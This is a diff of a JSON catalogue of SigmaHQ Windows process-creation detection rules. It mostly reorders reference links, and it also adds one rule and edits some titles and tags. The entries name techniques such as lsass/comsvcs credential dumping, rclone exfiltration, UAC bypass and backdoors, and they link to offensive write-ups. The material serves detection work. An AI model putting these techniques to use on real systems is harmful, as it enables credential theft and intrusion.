"tags": [ @@ -56817,8 +56930,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys", "https://app.any.run/tasks/9c0f37bc-867a-4314-b685-e101566766d7/", + "https://docs.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_add_run_key.yml" ], "tags": [ @@ -56851,8 +56964,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64", "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-FodHelperBypass.ps1#L64", + "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_empire_powershell_uac_bypass.yml" ], "tags": [ @@ -57013,9 +57126,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/", "http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/", "http://www.hexacorn.com/blog/2019/03/30/sqirrel-packages-manager-as-a-lolbin-a-k-a-many-electron-apps-are-lolbins-by-default/", - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_squirrel_download.yml" ], "tags": [ @@ -57084,10 +57197,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://gist.github.com/nasbench/6d58c3c125e2fa1b8f7a09754c1b087f", - "https://twitter.com/mrd0x/status/1511415432888131586", "https://twitter.com/mrd0x/status/1511489821247684615", + "https://gist.github.com/nasbench/6d58c3c125e2fa1b8f7a09754c1b087f", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/DumpMinitool/", + "https://twitter.com/mrd0x/status/1511415432888131586", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dumpminitool_execution.yml" ], "tags": [ @@ -57161,11 +57274,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html", - "https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone", - "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware", "https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/", + "https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone", "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a", + "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware", + "https://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_rclone_execution.yml" ], "tags": [ @@ -57254,8 +57367,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-3---port-scan-nmap-for-windows", "https://nmap.org/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-3---port-scan-nmap-for-windows", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_nmap_zenmap.yml" ], "tags": [ @@ -57313,9 +57426,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/", - "https://twitter.com/vxunderground/status/1423336151860002816", "https://attack.mitre.org/software/S0404/", + "https://twitter.com/vxunderground/status/1423336151860002816", + "https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_esentutl_params.yml" ], "tags": [ @@ -57390,8 +57503,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/_xpn_/status/1491557187168178176", "https://www.youtube.com/watch?v=Ie831jF0bb0", + "https://twitter.com/_xpn_/status/1491557187168178176", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_citrix_trolleyexpress_procdump.yml" ], "tags": [ @@ -57433,8 +57546,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://nsudo.m2team.org/en-us/", "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", + "https://nsudo.m2team.org/en-us/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_nsudo.yml" ], "tags": [ @@ -57640,9 +57753,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/", - "https://medium.com/@cyberjyot/t1218-008-dll-execution-using-odbcconf-exe-803fa9e08dac", "https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16", + "https://medium.com/@cyberjyot/t1218-008-dll-execution-using-odbcconf-exe-803fa9e08dac", + "https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_odbcconf_uncommon_child_process.yml" ], "tags": [ @@ -57675,14 +57788,14 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/Hexacorn/status/776122138063409152", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md", - "https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e", - "https://twitter.com/gN3mes1s/status/941315826107510784", "https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection", - "https://reaqta.com/2017/12/mavinject-microsoft-injector/", "https://github.com/SigmaHQ/sigma/issues/3742", + "https://twitter.com/Hexacorn/status/776122138063409152", + "https://twitter.com/gN3mes1s/status/941315826107510784", + "https://reaqta.com/2017/12/mavinject-microsoft-injector/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml" ], "tags": [ @@ -57724,8 +57837,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Aspnet_Compiler/", "https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/", + "https://lolbas-project.github.io/lolbas/Binaries/Aspnet_Compiler/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_aspnet_compiler_exectuion.yml" ], "tags": [ @@ -58003,12 +58116,12 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://labs.sentinelone.com/meteorexpress-mysterious-wiper-paralyzes-iranian-trains-with-epic-troll", "https://blog.malwarebytes.com/threat-intelligence/2021/08/new-variant-of-konni-malware-used-in-campaign-targetting-russia/", + "https://labs.sentinelone.com/meteorexpress-mysterious-wiper-paralyzes-iranian-trains-with-epic-troll", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml" ], "tags": [ - "attack.execution", + "attack.defense_evasion", "attack.t1218" ] }, @@ -58037,9 +58150,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", "https://twitter.com/frack113/status/1555830623633375232", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", + "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntfs_short_name_path_use_cli.yml" ], "tags": [ @@ -58072,8 +58185,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/", "https://pentestlab.blog/tag/svchost/", + "https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tasklist_module_enumeration.yml" ], "tags": [ @@ -58105,11 +58218,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/", - "https://github.com/cloudflare/cloudflared", - "https://www.intrinsec.com/akira_ransomware/", - "https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/do-more-with-tunnels/trycloudflare/", "https://github.com/cloudflare/cloudflared/releases", + "https://github.com/cloudflare/cloudflared", + "https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/do-more-with-tunnels/trycloudflare/", + "https://www.intrinsec.com/akira_ransomware/", + "https://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_cloudflared.yml" ], "tags": [ @@ -58256,13 +58369,13 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/shantanukhande/status/1229348874298388484", - "https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/", - "https://twitter.com/SBousseaden/status/1167417096374050817", - "https://twitter.com/pythonresponder/status/1385064506049630211?s=21", "https://twitter.com/Wietze/status/1542107456507203586", - "https://twitter.com/Hexacorn/status/1224848930795552769", + "https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/", + "https://twitter.com/pythonresponder/status/1385064506049630211?s=21", + "https://twitter.com/SBousseaden/status/1167417096374050817", "https://github.com/Hackndo/lsassy/blob/14d8f8ae596ecf22b449bfe919829173b8a07635/lsassy/dumpmethod/comsvcs.py", + "https://twitter.com/shantanukhande/status/1229348874298388484", + "https://twitter.com/Hexacorn/status/1224848930795552769", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_process_dump_via_comsvcs.yml" ], "tags": [ @@ -58374,10 +58487,10 @@ "logsource.product": "windows", "refs": [ "https://mgreen27.github.io/posts/2019/05/12/BinaryRename.html", - "https://twitter.com/christophetd/status/1164506034720952320", - "https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/megacortex-ransomware-spotted-attacking-enterprise-networks", "https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html", "https://threatresearch.ext.hp.com/svcready-a-new-loader-reveals-itself/", + "https://twitter.com/christophetd/status/1164506034720952320", + "https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/megacortex-ransomware-spotted-attacking-enterprise-networks", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant.yml" ], "tags": [ @@ -58479,11 +58592,11 @@ "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer", - "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", "https://labs.f-secure.com/blog/prelude-to-ransomware-systembc", "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf", - "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/", + "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/Advanced%20IP%20Scanner", + "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner.yml" ], "tags": [ @@ -58524,8 +58637,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/", "https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/", + "https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iis_appcmd_susp_module_install.yml" ], "tags": [ @@ -58559,11 +58672,11 @@ "logsource.product": "windows", "refs": [ "https://twitter.com/nas_bench/status/1433344116071583746", - "https://twitter.com/eral4m/status/1479080793003671557", "http://www.hexacorn.com/blog/2017/05/01/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline/", - "https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52", + "https://twitter.com/eral4m/status/1479080793003671557", "https://twitter.com/Hexacorn/status/885258886428725250", "https://twitter.com/eral4m/status/1479106975967240209", + "https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml" ], "tags": [ @@ -58630,8 +58743,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_export_critical_keys.yml" ], "tags": [ @@ -58664,9 +58777,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", - "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime", + "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/", + "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wab_unusual_parents.yml" ], "tags": [ @@ -58878,8 +58991,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://unit42.paloaltonetworks.com/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/", "https://app.any.run/tasks/c28cabc8-a19f-40f3-a78b-cae506a5c0d4", + "https://unit42.paloaltonetworks.com/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/", "https://app.any.run/tasks/cfc8870b-ccd7-4210-88cf-a8087476a6d0", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_attrib_system_susp_paths.yml" ], @@ -58900,6 +59013,39 @@ "uuid": "efec536f-72e8-4656-8960-5e85d091345b", "value": "Set Suspicious Files as System Files Using Attrib.EXE" }, + { + "description": "Detects addition of users to highly privileged groups via \"Net\" or \"Add-LocalGroupMember\".", + "meta": { + "author": "Nasreddine Bencherchali (Nextron Systems)", + "creation_date": "2024/02/23", + "falsepositive": [ + "Administrative activity that must be investigated" + ], + "filename": "proc_creation_win_susp_add_user_privileged_group.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_add_user_privileged_group.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ] + }, + "related": [ + { + "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "10fb649c-3600-4d37-b1e6-56ea90bb7e09", + "value": "User Added To Highly Privileged Group" + }, { "description": "Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).", "meta": { @@ -58913,8 +59059,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/", "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", + "https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_registry_install_reg_debugger_backdoor.yml" ], "tags": [ @@ -58982,8 +59128,8 @@ "logsource.product": "windows", "refs": [ "https://mgreen27.github.io/posts/2019/05/12/BinaryRename.html", - "https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1036.003/T1036.003.md#atomic-test-1---masquerading-as-windows-lsass-process", "https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html", + "https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1036.003/T1036.003.md#atomic-test-1---masquerading-as-windows-lsass-process", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_binary.yml" ], "tags": [ @@ -59004,7 +59150,7 @@ "value": "Potential Defense Evasion Via Binary Rename" }, { - "description": "Detects suspicious command line in which a user gets added to the local Remote Desktop Users group", + "description": "Detects addition of users to the local Remote Desktop Users group via \"Net\" or \"Add-LocalGroupMember\".", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021/12/06", @@ -59051,7 +59197,7 @@ } ], "uuid": "ffa28e60-bdb1-46e0-9f82-05f7a61cc06e", - "value": "Suspicious Add User to Remote Desktop Users Group" + "value": "User Added to Remote Desktop Users Group" }, { "description": "Detects the malicious use of a control panel item", @@ -59210,8 +59356,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/mrd0x/status/1463526834918854661", "https://gist.github.com/nasbench/a989ce64cefa8081bd50cf6ad8c491b5", + "https://twitter.com/mrd0x/status/1463526834918854661", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pressanykey_lolbin_execution.yml" ], "tags": [ @@ -59247,8 +59393,8 @@ "refs": [ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Agentexecutor/", "https://twitter.com/jseerden/status/1247985304667066373/photo/1", - "https://twitter.com/lefterispan/status/1286259016436514816", "https://docs.microsoft.com/en-us/mem/intune/apps/intune-management-extension", + "https://twitter.com/lefterispan/status/1286259016436514816", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_agentexecutor_susp_usage.yml" ], "tags": [ @@ -59281,9 +59427,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.hybrid-analysis.com/search?query=context:74940dcc5b38f9f9b1a0fea760d344735d7d91b610e6d5bd34533dd0153402c5&from_sample=5db135000388385a7644131f&block_redirect=1", "https://www.securitynewspaper.com/2016/11/23/technical-teardown-exploit-malware-hwp-files/", "https://blog.alyac.co.kr/1901", + "https://www.hybrid-analysis.com/search?query=context:74940dcc5b38f9f9b1a0fea760d344735d7d91b610e6d5bd34533dd0153402c5&from_sample=5db135000388385a7644131f&block_redirect=1", "https://twitter.com/cyberwar_15/status/1187287262054076416", "https://en.wikipedia.org/wiki/Hangul_(word_processor)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hwp_exploits.yml" @@ -59402,8 +59548,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md#atomic-test-4---infdefaultinstallexe-inf-execution", "https://lolbas-project.github.io/lolbas/Binaries/Infdefaultinstall/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md#atomic-test-4---infdefaultinstallexe-inf-execution", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_infdefaultinstall_execute_sct_scripts.yml" ], "tags": [ @@ -59504,9 +59650,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://twitter.com/sblmsrsn/status/1445758411803480072?s=20", "https://lolbas-project.github.io/lolbas/Binaries/Certoc/", "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-fe98e74189873d6df72a15df2eaa0315c59ba9cdaca93ecd68afc4ea09194ef2", - "https://twitter.com/sblmsrsn/status/1445758411803480072?s=20", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certoc_load_dll.yml" ], "tags": [ @@ -59562,8 +59708,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Cdb/", "https://web.archive.org/web/20170715043507/http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Cdb/", "https://twitter.com/nas_bench/status/1534957360032120833", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cdb.yml" ], @@ -59683,9 +59829,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.nirsoft.net/utils/nircmd.html", - "https://www.nirsoft.net/utils/nircmd2.html#using", "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", + "https://www.nirsoft.net/utils/nircmd2.html#using", + "https://www.nirsoft.net/utils/nircmd.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_nircmd.yml" ], "tags": [ @@ -59920,8 +60066,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/", "https://twitter.com/0gtweet/status/1674399582162153472", + "https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_registry_provlaunch_provisioning_command.yml" ], "tags": [ @@ -60056,9 +60202,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/", - "https://www.vmray.com/cyber-security-blog/analyzing-ursnif-behavior-malware-sandbox/", "https://www.fireeye.com/blog/threat-research/2020/01/saigon-mysterious-ursnif-fork.html", + "https://www.vmray.com/cyber-security-blog/analyzing-ursnif-behavior-malware-sandbox/", + "https://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_driverquery_recon.yml" ], "tags": [ @@ -60069,7 +60215,7 @@ "value": "Potential Recon Activity Using DriverQuery.EXE" }, { - "description": "Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE", + "description": "Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE\nCheck if the user that executed the commands is suspicious (e.g. service accounts, LOCAL_SYSTEM)\n", "meta": { "author": "Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2019/01/16", @@ -60082,8 +60228,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", + "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_groups_and_accounts_recon.yml" ], @@ -60320,8 +60466,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/", "https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bginfo_suspicious_child_process.yml" ], "tags": [ @@ -60437,9 +60583,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://app.any.run/tasks/40115012-a919-4208-bfed-41e82cb3dadf/", - "https://twitter.com/bigmacjpg/status/1349727699863011328?s=12", "http://hyp3rlinx.altervista.org/advisories/Windows_TCPIP_Finger_Command_C2_Channel_and_Bypassing_Security_Software.txt", + "https://twitter.com/bigmacjpg/status/1349727699863011328?s=12", + "https://app.any.run/tasks/40115012-a919-4208-bfed-41e82cb3dadf/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_finger_usage.yml" ], "tags": [ @@ -60539,9 +60685,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/", "https://twitter.com/_JohnHammond/status/1531672601067675648", "https://twitter.com/nao_sec/status/1530196847679401984", + "https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt_arbitrary_command_execution.yml" ], "tags": [ @@ -60574,10 +60720,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/", - "https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/do-more-with-tunnels/trycloudflare/", - "https://www.intrinsec.com/akira_ransomware/", "https://github.com/cloudflare/cloudflared", + "https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/do-more-with-tunnels/trycloudflare/", + "https://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/", + "https://www.intrinsec.com/akira_ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cloudflared_quicktunnel_execution.yml" ], "tags": [ @@ -60610,9 +60756,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-japan-espionage", "https://lolbas-project.github.io/lolbas/Binaries/Tar/", "https://unit42.paloaltonetworks.com/chromeloader-malware/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-japan-espionage", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tar_extraction.yml" ], "tags": [ @@ -60741,7 +60887,7 @@ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_curl_download_exec_combo.yml" ], "tags": [ - "attack.execution", + "attack.defense_evasion", "attack.t1218", "attack.command_and_control", "attack.t1105" @@ -60781,8 +60927,8 @@ "refs": [ "https://www.elastic.co/guide/en/security/current/remote-file-copy-to-a-hidden-share.html", "https://twitter.com/SBousseaden/status/1211636381086339073", - "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view", "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", + "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_copy_lateral_movement.yml" ], "tags": [ @@ -60900,8 +61046,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://app.any.run/tasks/61a296bb-81ad-4fee-955f-3b399f4aaf4b", "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets", + "https://app.any.run/tasks/61a296bb-81ad-4fee-955f-3b399f4aaf4b", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysprep_appdata.yml" ], "tags": [ @@ -61000,13 +61146,13 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.joeware.net/freetools/tools/adfind/", - "https://thedfirreport.com/2020/05/08/adfind-recon/", "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx", "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/", + "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md", + 